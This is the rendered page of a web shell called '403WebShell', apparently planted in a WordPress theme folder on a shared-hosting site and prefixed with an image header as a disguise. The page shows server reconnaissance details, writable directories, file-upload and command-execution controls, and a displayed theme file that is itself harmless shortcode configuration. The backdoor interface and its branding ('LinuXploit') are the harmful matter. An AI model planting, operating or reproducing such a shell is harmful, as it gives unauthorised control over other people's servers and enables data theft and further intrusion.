????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.112.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/eaabusiness.com/wp-content/themes/globeco/vc/theme_shortcodes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/eaabusiness.com/wp-content/themes/globeco/vc/theme_shortcodes/cws_sc_benefits.php
<?php
	global $cws_theme_funcs;
	$first_color 	= esc_attr( $cws_theme_funcs->cws_get_option( 'theme-first-color' ) );
	$second_color 	= esc_attr( $cws_theme_funcs->cws_get_option( 'theme-second-color' ) );

	$params = cws_ext_merge_arrs(
		array(
			array(
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Subtitle', 'globeco' ),
					"param_name"	=> "subtitle",
				),
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Subtitle Note', 'globeco' ),
					"param_name"	=> "subtitle_note",
				),
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Title', 'globeco' ),
					"param_name"	=> "title",
				),
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Category', 'globeco' ),
					"param_name"	=> "category",
				),
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Description', 'globeco' ),
					"param_name"	=> "description",
				),
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Module Height', 'globeco' ),
					"param_name"	=> "block_size",
					"description"	=> esc_html__( 'Information will always be in the center. Enter values in pixels', 'globeco' ),
				),
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Module Height on Tablets(Portrait) & Phones', 'globeco' ),
					"param_name"	=> "block_size_mob",
					"description"	=> esc_html__( 'Information will always be in the center. Enter values in pixels', 'globeco' ),
				),
				array(
					"type"			=> "checkbox",
					"param_name"	=> "no_paddings",
					"value"			=> array( esc_html__( 'Remove default paddings', 'globeco' ) => true )
				),
				array(
					"type"			=> "checkbox",
					"param_name"	=> "add_button",
					"value"			=> array( esc_html__( 'Add Button', 'globeco' ) => true )
				),
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Button URL', 'globeco' ),
					"param_name"	=> "button_url",
					"dependency"	=> array(
						"element"	=> "add_button",
						"not_empty"	=> true
					),
				),
				array(
					"type"			=> "textfield",
					"heading"		=> esc_html__( 'Button Link', 'globeco' ),
					"param_name"	=> "button_link",
					"dependency"	=> array(
						"element"	=> "add_button",
						"not_empty"	=> true
					),
				),
				array(
					"type"			=> "checkbox",
					"param_name"	=> "new_window",
					"dependency"	=> array(
						"element"	=> "add_button",
						"not_empty"	=> true
					),
					"value"			=> array( esc_html__( 'Open In New Window', 'globeco' ) => true )
				),
				array(
					"type"			=> "checkbox",
					"param_name"	=> "customize_colors",
					"value"			=> array( esc_html__( 'Customize Colors', 'globeco' ) => true )
				),
				array(
					"type"			=> "colorpicker",
					"heading"		=> esc_html__( 'Background Color', 'globeco' ),
					"param_name"	=> "background_color",
					"dependency"	=> array(
						"element"	=> "customize_colors",
						"not_empty"	=> true
					),
					"value"			=> $first_color
				),
				array(
					"type"			=> "colorpicker",
					"heading"		=> esc_html__( 'Background Color on Hover', 'globeco' ),
					"param_name"	=> "background_color_hover",
					"dependency"	=> array(
						"element"	=> "customize_colors",
						"not_empty"	=> true
					),
					"value"			=> $second_color
				),
				array(
					"type"			=> "colorpicker",
					"heading"		=> esc_html__( 'Subtitle Color', 'globeco' ),
					"param_name"	=> "subtitle_color",
					"dependency"	=> array(
						"element"	=> "customize_colors",
						"not_empty"	=> true
					),
					"value"			=> $second_color
				),
				array(
					"type"			=> "colorpicker",
					"heading"		=> esc_html__( 'Text Color', 'globeco' ),
					"param_name"	=> "text_color",
					"dependency"	=> array(
						"element"	=> "customize_colors",
						"not_empty"	=> true
					),
					"value"			=> '#fff'
				),
				array(
					"type"			=> "colorpicker",
					"heading"		=> esc_html__( 'Text Color on Hover', 'globeco' ),
					"param_name"	=> "text_color_hover",
					"dependency"	=> array(
						"element"	=> "customize_colors",
						"not_empty"	=> true
					),
					"value"			=> '#fff'
				),
				array(
					"type"			=> "colorpicker",
					"heading"		=> esc_html__( 'Button Color', 'globeco' ),
					"param_name"	=> "button_color",
					"dependency"	=> array(
						"element"	=> "customize_colors",
						"not_empty"	=> true
					),
					"value"			=> '#fff'
				),
				array(
					"type"			=> "colorpicker",
					"heading"		=> esc_html__( 'Button Color on Hover', 'globeco' ),
					"param_name"	=> "button_color_hover",
					"dependency"	=> array(
						"element"	=> "customize_colors",
						"not_empty"	=> true
					),
					"value"			=> '#fff'
				),
			)
		)
	);

	vc_map( array(
		"name"				=> esc_html__( 'CWS Benefits', 'globeco' ),
		"base"				=> "cws_sc_benefits",
		'category'			=> "By CWS",
		"icon"     			=> "cws_icon",
		"weight"			=> 80,
		"params"			=> $params
	));

	if ( class_exists( 'WPBakeryShortCode' ) ) {
	    class WPBakeryShortCode_CWS_Sc_Benefits extends WPBakeryShortCode {
	    }
	}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit